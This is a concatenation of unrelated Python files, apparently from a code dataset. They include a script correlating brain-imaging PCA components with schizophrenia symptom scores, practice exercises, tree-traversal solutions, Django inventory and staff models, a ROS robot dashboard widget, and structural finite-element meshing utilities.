#\n################\n\nINPUT_BASE_DIR = '/neurospin/brainomics/2016_schizConnect/analysis/NUSDAST/VBM/results/pcatv'\nINPUT_DIR = os.path.join(INPUT_BASE_DIR,\"5_folds_NUDAST\",\"results\")\nINPUT_MASK = '/neurospin/brainomics/2016_schizConnect/analysis/NUSDAST/VBM/data/mask.nii' \n\n\nINPUT_CLINIC_FILENAME = \"/neurospin/abide/schizConnect/data/schizconnect_NUSDAST_assessmentData_1829.csv\"\nINPUT_POPULATION = \"/neurospin/brainomics/2016_schizConnect/analysis/NUSDAST/VBM/population.csv\"\n\n\n\n# PROBLEM: there are multiple scores for each subject!\nclinic = pd.read_csv(INPUT_CLINIC_FILENAME)\npop = pd.read_csv(INPUT_POPULATION)\npop[\"SAPS\"] = \"NaN\"\npop[\"SANS\"] = \"NaN\"\nfor s in pop.subjectid:\n    print (s)\n    curr = clinic[clinic.subjectid ==s]\n    most_recent_visit = curr.visit.unique()[-1]\n    curr = curr[curr.visit == most_recent_visit]\n    current_SAPS = curr[curr.assessment_description == \"Scale for the Assessment of Positive Symptoms\"].question_value.astype(np.int64).values\n    current_SANS = curr[curr.assessment_description == \"Scale for the Assessment of Negative Symptoms\"].question_value.astype(np.int64).values \n    if len(current_SAPS) != 0:\n        pop.loc[pop.subjectid ==s,\"SAPS\"] = current_SAPS.sum()\n        print (current_SAPS.sum())\n    if len(current_SANS) != 0: \n        pop.loc[pop.subjectid ==s,\"SANS\"] = current_SANS.sum()\n    \n\n \n#investigate distribution of SAPS and SANS scores across SCZ population \nSAPS_scores = pop[pop.dx_num ==1].SAPS.astype(np.float).values\nSANS_scores = pop[pop.dx_num ==1].SANS.astype(np.float).values \n\n\nscores_PCA_path = \"/neurospin/brainomics/2016_schizConnect/analysis/NUSDAST/VBM/results/pcatv/5_folds_NUDAST/results/0/struct_pca_0.1_0.5_0.8/X_train_transform.npz\"\nscores_comp = np.load(scores_PCA_path)['arr_0']\n\n#Pearson correlation\npearsonr(scores_comp[:,0],SAPS_scores)\npearsonr(scores_comp[:,0],SANS_scores)\n\npearsonr(scores_comp[:,1],SAPS_scores)\npearsonr(scores_comp[:,1],SANS_scores)\n\npearsonr(scores_comp[:,2],SAPS_scores)\npearsonr(scores_comp[:,2],SANS_scores)\n\npearsonr(scores_comp[:,3],SAPS_scores)\npearsonr(scores_comp[:,3],SANS_scores)\n\npearsonr(scores_comp[:,4],SAPS_scores)\npearsonr(scores_comp[:,4],SANS_scores)\n\n\n#COMPONENT 1\nplt.plot(scores_comp[:,0],SAPS_scores,'o')\nplt.xlabel('Score on component 1')\nplt.ylabel('SAPS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.09\",fontsize=12)\n\nplt.plot(scores_comp[:,0],SANS_scores,'o')\nplt.xlabel('Score on component 1')\nplt.ylabel('SANS score')\nplt.text(-0.05,74,\"Pearson's correlation = 0.01\",fontsize=12)\n\n#COMPONENT 2\nplt.plot(scores_comp[:,1],SAPS_scores,'o')\nplt.xlabel('Score on component 2')\nplt.ylabel('SAPS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.09\",fontsize=12)\n\nplt.plot(scores_comp[:,1],SANS_scores,'o')\nplt.xlabel('Score on component 2')\nplt.ylabel('SANS score')\nplt.text(-0.05,74,\"Pearson's correlation = 0.03\",fontsize=12)\n\n\n#COMPONENT 3\nplt.plot(scores_comp[:,2],SAPS_scores,'o')\nplt.xlabel('Score on component 3')\nplt.ylabel('SAPS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.067\",fontsize=12)\n\nplt.plot(scores_comp[:,2],SANS_scores,'o')\nplt.xlabel('Score on component 3')\nplt.ylabel('SANS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.11\",fontsize=12)\n\n\n#COMPONENT 4\nplt.plot(scores_comp[:,3],SAPS_scores,'o')\nplt.xlabel('Score on component 4')\nplt.ylabel('SAPS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.017\",fontsize=12)\n\nplt.plot(scores_comp[:,3],SANS_scores,'o')\nplt.xlabel('Score on 
component 4')\nplt.ylabel('SANS score')\nplt.text(-0.05,74,\"Pearson's correlation = 0.04\",fontsize=12)\n\n\n\n#COMPONENT 5\nplt.plot(scores_comp[:,4],SAPS_scores,'o')\nplt.xlabel('Score on component 5')\nplt.ylabel('SAPS score')\nplt.text(-0.15,74,\"Pearson's correlation = 0.18, p = 0.04\",fontsize=12)\n\nplt.plot(scores_comp[:,4],SANS_scores,'o')\nplt.xlabel('Score on component 5')\nplt.ylabel('SANS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.02\",fontsize=12)\n\n\n","sub_path":"2016_schizConnect/unsupervised analysis/NUSDAST/50yo_scripts/pcatv_components_analysis_NUDAST.py","file_name":"pcatv_components_analysis_NUDAST.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"438332919","text":"# li = [(1, 2, 3), (4, 5, 6), (7, 8, 9)]\n# result = ''.join([j for i in li for j in i])\n# print(result)\n# li=[2000,20001,20003]\n# result={i:('yes'if i%100==0 & i%4==0 else 'no') for i in li }\n#\n# n = 10\n# result = [i for i in range(1, n + 1) if all(i % j != 0 for j in range(2, i))]\n# print(result)\n\nlist1 = [i for i in range(1, 10) for j in range(2, i) if i % j == 0 and i != j]\nresult = [i for i in range(1, 10) if i not in list1]\nprint(result)\n","sub_path":"practice/comprehension_practice.py","file_name":"comprehension_practice.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"7233325","text":"# Definition for a binary tree node.\r\n# class TreeNode(object):\r\n#     def __init__(self, x):\r\n#         self.val = x\r\n#         self.left = None\r\n#         self.right = None\r\n\r\n# Iterative\r\nclass Solution(object):\r\n    def levelOrder(self, root):\r\n        \"\"\"\r\n        :type root: TreeNode\r\n        :rtype: List[List[int]]\r\n        \"\"\"\r\n        queue = [(root, 0)]\r\n        last_level = 0\r\n        result = []\r\n        level = []\r\n        while len(queue):\r\n            node = queue[0]\r\n            del queue[0]\r\n            if node[0] is None:\r\n                continue\r\n            if last_level == node[1]:\r\n                level.append(node[0].val)\r\n            else:\r\n                result.append(level)\r\n                level = [node[0].val]\r\n                last_level = node[1]\r\n            queue.extend([(node[0].left, node[1]+1), (node[0].right, node[1]+1)])\r\n        if level:\r\n            result.append(level)\r\n        return result\r\n    \r\n    \r\n# Recursive\r\nclass Solution(object):\r\n    result = []\r\n    \r\n    def levelOrder(self, root):\r\n        \"\"\"\r\n        :type root: TreeNode\r\n        :rtype: List[List[int]]\r\n        \"\"\"\r\n        if root is None:\r\n            return []\r\n        self.result = []\r\n        self.traversal(root, 0)\r\n        return self.result\r\n    \r\n    def traversal(self, node, level):\r\n        if len(self.result) <= level:\r\n            self.result.append([node.val])\r\n        else:\r\n            self.result[level].append(node.val)\r\n        if node.left:\r\n            self.traversal(node.left, level+1)\r\n        if node.right:\r\n            self.traversal(node.right, level+1)","sub_path":"src/102_BinaryTreeLevelOrderTraversal.py","file_name":"102_BinaryTreeLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"152735326","text":"from django.db import models\n\n\n# ==================== Permissions =============================\n# Permission\nclass Permissions(models.Model):\n    id = models.AutoField(primary_key=True, verbose_name='主键')\n    permissions_name = models.CharField(max_length=12, unique=True, verbose_name='权限名称')\n    permissions_url = models.CharField(max_length=100, unique=True, verbose_name='权限url')\n    permissions_url_function = models.CharField(max_length=100, 
unique=True, verbose_name='权限url职能')\n\n\n# ============== HR / personnel ================================\n# Department table\nclass Department(models.Model):\n    id = models.AutoField(primary_key=True, verbose_name='主键')\n    name = models.CharField(max_length=12, unique=True, blank=True, verbose_name='部门名称')\n    # NOTE: ManyToManyField accepts neither to_field nor on_delete (those are ForeignKey options)\n    department_and_permissions = models.ManyToManyField(to=\"Permissions\",\n                                                        verbose_name='权限与部门多对多关系')\n\n\n# Staff\nclass Staff(models.Model):\n    id = models.AutoField(primary_key=True, verbose_name='主键')\n    staff_info = models.OneToOneField(to='StaffInfo', to_field=\"id\", on_delete=models.CASCADE,\n                                      verbose_name='员工与员工详情一对一关系')\n    department_and_staff = models.ManyToManyField(to=\"Department\",\n                                                  verbose_name='员工与部门多对多关系')\n    staff_and_permissions = models.ManyToManyField(to=\"Permissions\",\n                                                   verbose_name='权限与员工多对多关系')\n\n\n# Staff info\nclass StaffInfo(models.Model):\n    id = models.AutoField(primary_key=True, verbose_name='主键')\n    work_number = models.CharField(max_length=12, unique=True, verbose_name='工号')\n    password = models.CharField(max_length=12, verbose_name='密码')\n    staff_name = models.CharField(max_length=10, verbose_name='员工姓名')\n    staff_age = models.CharField(max_length=10, verbose_name='员工年龄')\n    staff_gender = models.CharField(max_length=10, verbose_name='员工性别')\n    staff_position = models.CharField(max_length=10, verbose_name='员工职位')\n    staff_state = models.CharField(max_length=10, choices=((1, '在职'), (2, '办理离职中'), (3, '离职')), verbose_name='员工状态')\n    staff_date_birth = models.DateTimeField(verbose_name='员工出生日期')\n    staff_induction_date = models.DateTimeField(verbose_name='员工入职时间')\n    staff_departure_date = models.DateTimeField(verbose_name='员工离职职时间', blank=True)\n    staff_phone = models.CharField(max_length=12, verbose_name='员工联系电话')\n    staff_emergency_phone = models.CharField(max_length=12, verbose_name='员工紧急联系电话')\n    staff_email = models.EmailField(max_length=20, verbose_name='员工邮箱')\n    staff_contract_no = models.CharField(max_length=20, verbose_name='员工合同编号')\n    staff_contract_deadline_date = models.DateTimeField(verbose_name='员工合同截止日期')\n\n\n# Appointment table\nclass Appointment(models.Model):\n    id = models.AutoField(primary_key=True, verbose_name='主键')\n    appointment_people = models.CharField(max_length=12, verbose_name='预约人')\n    appointment_people_iphone = models.CharField(max_length=12, verbose_name='预约人电话')\n    being_appointment_people = models.ManyToManyField(to=\"Staff\",\n                                                      verbose_name='被预约人')\n    appointment_date = models.DateTimeField(verbose_name='预约时间')\n    apply_date = models.DateTimeField(verbose_name='预约申请时间')\n    note = models.CharField(max_length=100, verbose_name='备注')\n\n\n# ================== Warehouse =================================\n# Item category\nclass Item_Category(models.Model):\n    id = models.AutoField(primary_key=True, verbose_name='主键')\n    category_name = models.CharField(max_length=12, unique=True, verbose_name='物品类别名称')\n\n    def __str__(self):\n        return self.category_name\n\n\n# Items table\nclass Items(models.Model):\n    id = models.AutoField(primary_key=True, verbose_name='主键')\n    item_name = models.CharField(max_length=21, unique=True, verbose_name='物品名称')\n    # Many-to-many relation between items and categories\n    items_and_category = models.ManyToManyField(to=\"Item_Category\",\n                                                verbose_name='物品与类别多对多关系')\n\n    def __str__(self):\n        return self.item_name\n\n\n# Item details table\nclass Item_Details(models.Model):\n    id = models.AutoField(primary_key=True, 
verbose_name='主键')\n    items = models.ForeignKey(to=\"Items\", to_field=\"id\", on_delete=models.CASCADE, verbose_name='物品与物品详情一对多关系')\n    item_type = models.CharField(max_length=50, verbose_name='物品型号')\n    items_manufacturer = models.CharField(max_length=50, verbose_name='物品厂家', blank=True)\n    production_date = models.DateTimeField(verbose_name='生产日期', blank=True)\n    period_validity = models.IntegerField(verbose_name='有效期', blank=True)\n    quantity = models.IntegerField(verbose_name='数量')\n    unit_price = models.FloatField(verbose_name='单价')\n    state = models.CharField(max_length=10, verbose_name='状态')\n\n\n# Outbound (stock-out) record table\nclass OutStore(models.Model):\n    id = models.AutoField(primary_key=True, verbose_name='主键')\n    out_storage_quantity = models.IntegerField(verbose_name='数量')\n    out_storage_time = models.DateTimeField(verbose_name='出库时间', blank=True)\n    # Many-to-many relation between item details and out-storage records\n    out_storage_items = models.ManyToManyField(to=\"Item_Details\",\n                                               verbose_name='物品与出库多对多关系')\n    # related_name disambiguates the two many-to-many links to Staff\n    get_user = models.ManyToManyField(to=\"Staff\", related_name='received_out_stores', verbose_name='物品与领取人多对多关系')\n    out_storage_user = models.ManyToManyField(to=\"Staff\", related_name='issued_out_stores',\n                                              verbose_name='物品与出库人多对多关系')\n    out_storage_note = models.CharField(max_length=20, verbose_name='物品出库备注')\n\n\n# Inbound (stock-in) record table\nclass PutStore(models.Model):\n    id = models.AutoField(primary_key=True, verbose_name='主键')\n    # Many-to-many relation between item details and put-storage records\n    out_storage_items = models.ManyToManyField(to=\"Item_Details\",\n                                               verbose_name='物品与入库多对多关系')\n    put_storage_time = models.DateTimeField(verbose_name='入库时间', blank=True)\n    # related_name disambiguates the two many-to-many links to Staff\n    procurement = models.ManyToManyField(to=\"Staff\", related_name='procured_put_stores',\n                                         verbose_name='采购人或还物品人多对多关系')\n    warehouse_people = models.ManyToManyField(to=\"Staff\", related_name='stored_put_stores',\n                                              verbose_name='入库人与物品多对多关系')\n    put_storage_note = models.CharField(max_length=20, verbose_name='物品入库备注', blank=True)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"418880262","text":"#******************************************************\r\n#Program Name: slide26.py\r\n#Programmer: Gabriela Tolosa Ramirez\r\n#CSC - 119: Fall 2018 - 002\r\n#Date: Nov 5,2018\r\n#Purpose: Manipulate 2D list\r\n#Modules used: None\r\n#Input Variable(s): None\r\n#Output(s): myList\r\n#******************************************************\r\n\r\n## squares the values of a given list\r\n# @param theList indicating the list being squared\r\n# @return sqList\r\ndef squares(theList):\r\n    sqList = list(theList)\r\n    for i in range(len(sqList)):\r\n        sqList[i] = sqList[i]*sqList[i]\r\n    return sqList\r\n\r\ndef main():\r\n    myList = [\r\n        [1,1,1],\r\n        [1,1,1],\r\n        [1,1,1,]\r\n        ]\r\n\r\n    #from slide\r\n    for i in range(len(myList[2])):\r\n        myList[2][i] = myList[2][i]+5\r\n    print (myList)\r\n\r\n    #changed first row to all zeros\r\n    for i in range(len(myList[0])):\r\n        myList[0][i] = 0\r\n    print(myList)\r\n\r\n    #change second row to be [1,2,3]\r\n    x = 0\r\n    for i in range(len(myList[1])):\r\n        x+=1\r\n        myList[1][i] = x\r\n    print(myList)\r\n\r\n    #add a fourth row that is [0,1,2]\r\n    newList = [0,1,2]\r\n    myList.append(newList)\r\n    print(myList)\r\n\r\n    #add a fifth row that is the squares of row 2\r\n    newList = squares(myList[1])\r\n    myList.append(newList)\r\n    print(myList)\r\n\r\n    #print 2D\r\n    row = 5\r\n    column = 3\r\n    
for i in range(row):\r\n for j in range(column):\r\n print(\"%10d\"%(myList[i][j]),end=\"\")\r\n print()\r\n\r\n\r\nmain()\r\n","sub_path":"In-Class work/Day 11/slide26.py","file_name":"slide26.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"571210884","text":"#!/usr/bin/env python\n\nfrom hrpsys_ros_bridge.hrpsys_dashboard import HrpsysDashboard\nfrom rqt_robot_dashboard.widgets import MenuDashWidget\n\nfrom python_qt_binding.QtGui import QMessageBox, QLabel, QPalette\n\nimport os\nclass HiroNXNameLabel(QLabel):\n def __init__(self, name):\n super(HiroNXNameLabel, self).__init__()\n palette = QPalette()\n self.setStyleSheet('font-size: larger; font-weight: bold; color: #ffffff; background-color: darkgreen;')\n self.setText(name)\n\nclass HiroNXDashboard(HrpsysDashboard):\n def setup(self, context):\n super(HiroNXDashboard, self).setup(context)\n self.name = \"HiroNX dashboard\"\n self._imp_button = None\n self._pose_button = None\n self._name_label = HiroNXNameLabel(\"HiroNX \"+os.environ[\"ROS_MASTER_URI\"]+\" \")\n\n def get_widgets(self):\n widgets = super(HiroNXDashboard, self).get_widgets()\n widgets.append([self._name_label])\n return widgets\n","sub_path":"hironx_ros_bridge/src/hironx_ros_bridge/hironx_dashboard.py","file_name":"hironx_dashboard.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"292667507","text":"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nfrom compas.topology import dijkstra_path\r\n\r\nfrom compas.geometry import add_vectors\r\nfrom compas.geometry import angles_points_xy\r\nfrom compas.geometry import area_polygon_xy\r\nfrom compas.geometry import centroid_points\r\nfrom compas.geometry import circle_from_points_xy\r\nfrom compas.geometry import cross_vectors\r\nfrom compas.geometry import distance_point_point\r\nfrom compas.geometry import length_vector\r\nfrom compas.geometry import normalize_vector\r\nfrom compas.geometry import scale_vector\r\nfrom compas.geometry import subtract_vectors\r\n\r\nfrom compas.utilities import geometric_key\r\n\r\nfrom time import time\r\n\r\ntry:\r\n from numpy import abs\r\n from numpy import arctan2\r\n from numpy import array\r\n from numpy import asarray\r\n from numpy import cos\r\n from numpy import dot\r\n from numpy import hstack\r\n from numpy import isnan\r\n from numpy import linspace\r\n from numpy import meshgrid\r\n from numpy import min\r\n from numpy import max\r\n from numpy import newaxis\r\n from numpy import pi\r\n from numpy import sin\r\n from numpy import squeeze\r\n from numpy import sum\r\n from numpy import tile\r\n from numpy import vstack\r\n from numpy import zeros\r\n from numpy.linalg import inv\r\nexcept ImportError:\r\n pass\r\n\r\ntry:\r\n from scipy.interpolate import griddata\r\n from scipy.sparse import csr_matrix\r\n from scipy.spatial import Delaunay\r\n from scipy.spatial import distance_matrix\r\nexcept ImportError:\r\n pass\r\n\r\ntry:\r\n from compas.viewers import VtkVoxels\r\nexcept ImportError:\r\n pass\r\n\r\ntry:\r\n from meshpy.tet import build\r\n from meshpy.tet import MeshInfo\r\nexcept ImportError:\r\n pass\r\n\r\n\r\n__author__ = ['Andrew Liew ', 'Tomas Mendez ']\r\n__copyright__ = 'Copyright 2018, BLOCK Research Group - ETH Zurich'\r\n__license__ = 'MIT License'\r\n__email__ = 
'liew@arch.ethz.ch'\r\n\r\n\r\n__all__ = [\r\n 'colorbar',\r\n 'combine_all_sets',\r\n 'discretise_faces',\r\n 'extrude_mesh',\r\n 'group_keys_by_attribute',\r\n 'group_keys_by_attributes',\r\n 'network_order',\r\n 'normalise_data',\r\n 'postprocess',\r\n 'process_data',\r\n 'tets_from_vertices_faces',\r\n 'principal_stresses',\r\n 'plotvoxels',\r\n]\r\n\r\n\r\ndef colorbar(fsc, input='array', type=255):\r\n\r\n \"\"\" Creates RGB color information from -1 to 1 scaled values.\r\n\r\n Parameters\r\n ----------\r\n fsc : array, float\r\n (n x 1) array of scaled data, or a single float value.\r\n input : str\r\n Input given as an 'array' of numbers or a 'float'.\r\n type : int\r\n RGB as 255 or 1 scaled.\r\n\r\n Returns\r\n -------\r\n array, list\r\n (n x 3) array of RGB values or single RGB list.\r\n\r\n \"\"\"\r\n\r\n r = +abs(fsc + 0.25) * 2 - 0.5\r\n g = -abs(fsc - 0.25) * 2 + 1.5\r\n b = -(fsc - 0.25) * 2\r\n\r\n if input == 'array':\r\n rgb = hstack([r, g, b])\r\n rgb[rgb > 1] = 1\r\n rgb[rgb < 0] = 0\r\n return rgb * type\r\n\r\n elif input == 'float':\r\n r = max([0, min([1, r])])\r\n g = max([0, min([1, g])])\r\n b = max([0, min([1, b])])\r\n return [i * type for i in [r, g, b]]\r\n\r\n\r\ndef combine_all_sets(sets_a, sets_b):\r\n\r\n \"\"\" Combines two nested lists of node or element sets into the minimum ammount of set combinations.\r\n\r\n Parameters\r\n ----------\r\n sets_a : list\r\n First nested list containing lists of element or node keys.\r\n sets_b : list\r\n Second nested list containing lists of element or node keys.\r\n\r\n Returns\r\n -------\r\n dic\r\n A dictionary containing the minimum number of set combinations.\r\n\r\n \"\"\"\r\n\r\n comb = {}\r\n for i in sets_a:\r\n for j in sets_b:\r\n for x in sets_a[i]:\r\n if x in sets_b[j]:\r\n comb.setdefault(str(i) + ',' + str(j), []).append(x)\r\n return comb\r\n\r\n\r\ndef discretise_faces(vertices, faces, target, min_angle=15, factor=3, iterations=100, refine=True):\r\n\r\n \"\"\" Make an FE mesh from input coarse mesh data.\r\n\r\n Parameters\r\n ----------\r\n vertices : list\r\n Co-ordinates of coarse mesh vertices.\r\n faces : list\r\n Vertex numbers of each face of the coarse mesh.\r\n target : float\r\n Target length of each triangle.\r\n min_angle : float\r\n Minimum internal angle of triangles.\r\n factor : float\r\n Factor on the maximum area of each triangle.\r\n iterations : int\r\n Number of iterations per face.\r\n refine : bool\r\n Refine beyond Delaunay.\r\n\r\n Returns\r\n -------\r\n list\r\n Vertices of discretised faces.\r\n list\r\n Triangles of discretised faces.\r\n\r\n \"\"\"\r\n\r\n points_all = []\r\n faces_all = []\r\n\r\n Amax = factor * 0.5 * target**2\r\n\r\n for count, face in enumerate(faces):\r\n print('Face {0}/{1}'.format(count + 1, len(faces)))\r\n\r\n # Seed\r\n\r\n face.append(face[0])\r\n points = []\r\n for u, v in zip(face[:-1], face[1:]):\r\n sp = vertices[u]\r\n ep = vertices[v]\r\n vec = subtract_vectors(ep, sp)\r\n l = length_vector(vec)\r\n n = max([1, int(l / target)])\r\n for j in range(n):\r\n points.append(add_vectors(sp, scale_vector(vec, j / n)))\r\n\r\n # Starting orientation\r\n\r\n centroid = centroid_points(points)\r\n vec1 = subtract_vectors(points[1], points[0])\r\n vecc = subtract_vectors(centroid, points[0])\r\n vecn = cross_vectors(vec1, vecc)\r\n\r\n # Rotate about x\r\n\r\n points = array(points).transpose()\r\n phi = -arctan2(vecn[2], vecn[1]) + pi / 2\r\n Rx = array([[1., 0., 0.], [0., cos(phi), -sin(phi)], [0., sin(phi), cos(phi)]])\r\n vecn_x = 
dot(Rx, array(vecn)[:, newaxis])\r\n points_x = dot(Rx, points)\r\n Rxinv = inv(Rx)\r\n\r\n # Rotate about y\r\n\r\n psi = +arctan2(vecn_x[2, 0], vecn_x[0, 0]) - pi / 2\r\n Ry = array([[cos(psi), 0., sin(psi)], [0., 1., 0.], [-sin(psi), 0., cos(psi)]])\r\n points_y = dot(Ry, points_x)\r\n Ryinv = inv(Ry)\r\n\r\n # Store\r\n\r\n Vs = points_y.transpose()\r\n DTs = Delaunay(Vs[:, :2], furthest_site=False, incremental=False)\r\n tris = DTs.simplices\r\n points_xs = dot(Ryinv, Vs.transpose())\r\n points_new = [list(i) for i in list(dot(Rxinv, points_xs).transpose())]\r\n faces_new = [[int(i) for i in tri] for tri in list(tris)]\r\n\r\n # Refine\r\n\r\n if refine:\r\n\r\n V = points_y.transpose()\r\n z = float(V[0, 2])\r\n\r\n it = 0\r\n while it < iterations:\r\n DT = Delaunay(V[:, :2], furthest_site=False, incremental=False)\r\n tris = DT.simplices\r\n for u, v, w in tris:\r\n p1 = [float(i) for i in V[u, :2]]\r\n p2 = [float(i) for i in V[v, :2]]\r\n p3 = [float(i) for i in V[w, :2]]\r\n # th1 = angles_points_xy(p1, p2, p3)[0] * 180 / pi\r\n # th2 = angles_points_xy(p2, p3, p1)[0] * 180 / pi\r\n # th3 = angles_points_xy(p3, p1, p2)[0] * 180 / pi\r\n # print(th1, th2, th3) ] leads to some 0 and 180\r\n # thm = min([th1, th2, th3])\r\n res = circle_from_points_xy(p1, p2, p3)\r\n if res:\r\n c, r, _ = res\r\n c[2] = z\r\n A = area_polygon_xy([p1, p2, p3])\r\n # if (thm < min_angle) or (A > Amax):\r\n if A > Amax:\r\n dist = distance_matrix(array([c]), V, threshold=10**5)\r\n ins = len(dist[dist <= r])\r\n if ins <= 3:\r\n V = vstack([V, array([c])])\r\n break\r\n else:\r\n continue\r\n it += 1\r\n\r\n print('Iterations {0}'.format(it))\r\n\r\n points_x = dot(Ryinv, V.transpose())\r\n points_new = [list(i) for i in list(dot(Rxinv, points_x).transpose())]\r\n faces_new = [[int(i) for i in tri] for tri in list(tris)]\r\n\r\n points_all.append(points_new)\r\n faces_all.append(faces_new)\r\n\r\n return points_all, faces_all\r\n\r\n\r\ndef extrude_mesh(structure, mesh, layers, thickness, mesh_name, links_name, blocks_name):\r\n\r\n \"\"\" Extrudes a Mesh and adds/creates elements to a Structure.\r\n\r\n Parameters\r\n ----------\r\n structure : obj\r\n Structure object to update.\r\n mesh : obj\r\n Mesh datastructure\r\n layers : int\r\n Number of layers.\r\n thickness : float\r\n Layer thickness.\r\n mesh_name : str\r\n Name of set for mesh on final surface.\r\n links_name : str\r\n Name of set for adding links along extrusion.\r\n blocks_name : str\r\n Name of set for solid elements.\r\n\r\n Returns\r\n -------\r\n None\r\n\r\n Notes\r\n -----\r\n - Extrusion is along the Mesh vertex normals.\r\n\r\n \"\"\"\r\n\r\n ki = {}\r\n blocks = []\r\n mesh_faces = []\r\n links = []\r\n\r\n for key in mesh.vertices():\r\n\r\n normal = normalize_vector(mesh.vertex_normal(key))\r\n xyz = mesh.vertex_coordinates(key)\r\n ki['{0}_0'.format(key)] = structure.add_node(xyz)\r\n\r\n for i in range(layers):\r\n xyzi = add_vectors(xyz, scale_vector(normal, (i + 1) * thickness))\r\n ki['{0}_{1}'.format(key, i + 1)] = structure.add_node(xyzi)\r\n\r\n if links_name:\r\n node1 = ki['{0}_0'.format(key)]\r\n node2 = ki['{0}_{1}'.format(key, i + 1)]\r\n ez = normalize_vector(subtract_vectors(xyzi, xyz))\r\n try: # check\r\n ey = cross_vectors(ez, [1, 0, 0])\r\n except:\r\n pass\r\n ekey = structure.add_element(nodes=[node1, node2], type='SpringElement', acoustic=False, thermal=False,\r\n axes={'ez': ez, 'ey': ey})\r\n structure.elements[ekey].A = mesh.vertex_area(key)\r\n links.append(ekey)\r\n\r\n for face in 
mesh.faces():\r\n\r\n vs = mesh.face_vertices(face)\r\n\r\n for i in range(layers):\r\n bot = ['{0}_{1}'.format(j, i + 0) for j in vs]\r\n top = ['{0}_{1}'.format(j, i + 1) for j in vs]\r\n\r\n if blocks_name:\r\n if len(vs) == 3:\r\n etype = 'PentahedronElement'\r\n elif len(vs) == 4:\r\n etype = 'HexahedronElement'\r\n nodes = [ki[j] for j in bot + top]\r\n ekey = structure.add_element(nodes=nodes, type=etype, acoustic=False, thermal=False)\r\n blocks.append(ekey)\r\n\r\n if (i == layers - 1) and mesh_name:\r\n nodes = [ki[j] for j in top]\r\n ekey = structure.add_element(nodes=nodes, type='ShellElement', acoustic=False, thermal=False)\r\n mesh_faces.append(ekey)\r\n\r\n if blocks_name:\r\n structure.add_set(name=blocks_name, type='element', selection=blocks)\r\n if mesh_name:\r\n structure.add_set(name=mesh_name, type='element', selection=mesh_faces)\r\n if links:\r\n structure.add_set(name=links_name, type='element', selection=links)\r\n\r\n\r\ndef group_keys_by_attribute(adict, name, tol='3f'):\r\n\r\n \"\"\" Make group keys by shared attribute values.\r\n\r\n Parameters\r\n ----------\r\n adict : dic\r\n Attribute dictionary.\r\n name : str\r\n Attribute of interest.\r\n tol : float\r\n Float tolerance.\r\n\r\n Returns\r\n -------\r\n dic\r\n Group dictionary.\r\n\r\n \"\"\"\r\n\r\n groups = {}\r\n for key, item in adict.items():\r\n if name in item:\r\n value = item[name]\r\n if type(value) == float:\r\n value = '{0:.{1}}'.format(value, tol)\r\n groups.setdefault(value, []).append(key)\r\n return groups\r\n\r\n\r\ndef group_keys_by_attributes(adict, names, tol='3f'):\r\n\r\n \"\"\" Make group keys by shared values of attributes.\r\n\r\n Parameters\r\n ----------\r\n adict : dic\r\n Attribute dictionary.\r\n name : str\r\n Attributes of interest.\r\n tol : float\r\n Float tolerance.\r\n\r\n Returns\r\n -------\r\n dic\r\n Group dictionary.\r\n\r\n \"\"\"\r\n\r\n groups = {}\r\n for key, item in adict.items():\r\n values = []\r\n for name in names:\r\n if name in item:\r\n value = item[name]\r\n if type(value) == float:\r\n value = '{0:.{1}}'.format(value, tol)\r\n else:\r\n value = str(value)\r\n else:\r\n value = '-'\r\n values.append(value)\r\n vkey = '_'.join(values)\r\n groups.setdefault(vkey, []).append(key)\r\n return groups\r\n\r\n\r\ndef network_order(start, structure, network):\r\n\r\n \"\"\" Extract node and element orders from a Network for a given start-point.\r\n\r\n Parameters\r\n ----------\r\n start : list\r\n Start point co-ordinates.\r\n structure : obj\r\n Structure object.\r\n network : obj\r\n Network object.\r\n\r\n Returns\r\n -------\r\n list\r\n Ordered nodes.\r\n list\r\n Ordered elements.\r\n list\r\n Cumulative lengths at element mid-points.\r\n float\r\n Total length.\r\n\r\n \"\"\"\r\n\r\n gkey_key = network.gkey_key()\r\n start = gkey_key[geometric_key(start, '{0}f'.format(structure.tol))]\r\n leaves = network.leaves()\r\n leaves.remove(start)\r\n end = leaves[0]\r\n\r\n adjacency = {i: network.vertex_neighbours(i) for i in network.vertices()}\r\n weight = {(u, v): 1 for u, v in network.edges()}\r\n weight.update({(v, u): weight[(u, v)] for u, v in network.edges()})\r\n path = dijkstra_path(adjacency, weight, start, end)\r\n nodes = [structure.check_node_exists(network.vertex_coordinates(i)) for i in path]\r\n elements, arclengths, length = [], [], 0\r\n\r\n for i in range(len(nodes) - 1):\r\n sp = nodes[i]\r\n ep = nodes[i + 1]\r\n elements.append(structure.check_element_exists([sp, ep]))\r\n xyz_sp = structure.node_xyz(sp)\r\n xyz_ep = 
